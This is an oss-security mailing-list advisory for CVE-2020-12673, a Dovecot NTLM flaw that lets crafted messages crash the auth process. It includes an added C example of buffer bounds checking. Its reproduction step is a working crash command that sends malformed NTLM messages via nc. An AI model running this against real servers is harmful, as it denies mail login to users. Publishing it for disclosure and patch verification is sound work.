
List:       oss-security
Subject:    [oss-security] CVE-2020-12673: Dovecot IMAP server: Specially crafted NTLM package can crash auth se
From:       Aki Tuomi <aki.tuomi () dovecot ! fi>
Date:       2020-08-12 13:10:04
Message-ID: dd509a99-f78b-dd33-eca9-f0404dd6e1a2 () dovecot ! fi


Open-Xchange Security Advisory 2020-08-12

Affected product: Dovecot IMAP server
Internal reference: DOP-1870 (Bug ID)
Vulnerability type: CWE-789 (Uncontrolled Memory Allocation)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
CVE reference: CVE-2020-12673
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Dovecot's NTLM implementation does not correctly check the message buffer
size, which leads to reading past the allocation and can crash the process.
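The kind of check the advisory describes as missing, shown as an added illustration written for this post rather than Dovecot's own code: every NTLM security buffer (length/offset pair) of a Type 3 message is validated against the number of bytes actually received before any field is read. The six-buffer Type 3 layout follows the NTLMSSP AUTHENTICATE_MESSAGE format; the 66-byte sample message and the function names are constructed for the example, and later header fields (flags, version, MIC) are ignored here.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* NTLM security buffer: u16 length, u16 allocated length, u32 offset from the
 * start of the message (little-endian). A Type 3 message has six of them from
 * byte 12, after the 8-byte "NTLMSSP\0" signature and 4-byte message type. */
#define SBUF_SIZE 8
#define TYPE3_MIN_LEN (12 + 6 * SBUF_SIZE)
static uint32_t le16(const uint8_t *p) { return p[0] | (p[1] << 8); }
static uint32_t le32(const uint8_t *p) { return le16(p) | (le16(p + 2) << 16); }

/* True only when the descriptor at sbuf_off and the region it points to both
 * lie inside the msg_len bytes actually received. */
bool ntlm_sbuf_in_bounds(const uint8_t *msg, size_t msg_len, size_t sbuf_off)
{
    if (sbuf_off > msg_len || msg_len - sbuf_off < SBUF_SIZE)
        return false;                    /* descriptor itself is truncated */
    uint32_t len = le16(msg + sbuf_off), off = le32(msg + sbuf_off + 4);
    if (off > msg_len)
        return false;                    /* region starts past the message */
    return len <= msg_len - off;         /* subtract first: no wraparound */
}

/* Check signature, type and every security buffer before any field is used. */
bool ntlm_type3_valid(const uint8_t *msg, size_t msg_len)
{
    if (msg_len < TYPE3_MIN_LEN || memcmp(msg, "NTLMSSP", 8) != 0 || le32(msg + 8) != 3)
        return false;
    for (size_t off = 12; off < TYPE3_MIN_LEN; off += SBUF_SIZE)
        if (!ntlm_sbuf_in_bounds(msg, msg_len, off))
            return false;
    return true;
}

/* Constructed 66-byte Type 3 message: every buffer points at byte 60, the domain
 * descriptor (byte 28) gets dom_len/dom_off, and "orange" is stored at byte 60. */
static size_t build_type3(uint8_t out[66], uint32_t dom_len, uint32_t dom_off)
{
    memset(out, 0, 66);
    memcpy(out, "NTLMSSP\0\3\0\0\0", 12);
    for (size_t off = 12; off < TYPE3_MIN_LEN; off += SBUF_SIZE) out[off + 4] = 60;
    out[28] = (uint8_t)(dom_len & 0xff); out[29] = (uint8_t)(dom_len >> 8);
    out[32] = (uint8_t)(dom_off & 0xff); out[33] = (uint8_t)(dom_off >> 8);
    memcpy(out + 60, "orange", 6);
    return 66;
}

/* Well-formed: a 6-byte domain at byte 60 fits exactly (returns true). */
bool demo_well_formed(void) { uint8_t m[66]; size_t n = build_type3(m, 6, 60); return ntlm_type3_valid(m, n); }
/* Same length claimed at byte 65: only one byte remains, so it is rejected (false). */
bool demo_overlong_domain(void) { uint8_t m[66]; size_t n = build_type3(m, 6, 65); return ntlm_type3_valid(m, n); }
```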

Risk:
An adversary can use this vulnerability to crash the Dovecot auth process
repeatedly, preventing login.

Steps to reproduce:
(echo 'AUTH NTLM'; \
 echo -ne 'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' | base64 -w0; echo; \
 echo -ne 'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00orange\x00' | base64 -w0; echo; \
 echo QUIT) | nc 127.0.0.1 110

Workaround:
Disable NTLM authentication.

Solution:
Upgrade to fixed version.

Best regards,
Aki Tuomi
Open-Xchange oy
